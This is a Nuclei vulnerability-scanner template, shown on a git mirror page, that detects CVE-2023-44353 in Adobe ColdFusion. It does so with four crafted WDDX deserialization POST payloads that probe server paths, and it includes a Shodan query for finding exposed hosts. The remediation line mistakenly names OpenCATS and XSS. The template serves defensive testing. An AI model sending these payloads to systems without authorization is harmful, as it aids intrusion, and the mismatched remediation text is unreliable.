daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-44353.yaml

82 lines
3.7 KiB
YAML
Raw Blame History

id: CVE-2023-44353
info:
name: Adobe ColdFusion WDDX Deserialization Gadgets
author: salts
severity: critical
description: |
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-44353
cwe-id: CWE-502
epss-score: 0.00456
epss-percentile: 0.72579
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
tags: cve2023,cve,adobe,coldfusion,deserialization,xss
variables:
windows_known_path: "C:\\Windows\\"
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
linux_known_path: "/etc/"
linux_bad_path: "/thesecretcowlevelisreal/"
http:
- raw:
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
- |
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
matchers-condition: or
matchers:
- type: dsl
name: windows
dsl:
- "status_code_1 == 500 && status_code_2 == 404"
- contains(body_1, "coldfusion.runtime")
condition: and
- type: dsl
name: linux
dsl:
- "status_code_3 == 500 && status_code_4 == 404"
- contains(body_3, "coldfusion.runtime")
condition: and
# digest: 4a0a004730450220047bd272fa85a31954610677163c6d46bc1bc7e4cbe15197f0a08be5f0919fcf022100a0fbfd66e5f0e75667e67d3994d5f3fda3fa376e5401a3eee32f69955eb0e4e8:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink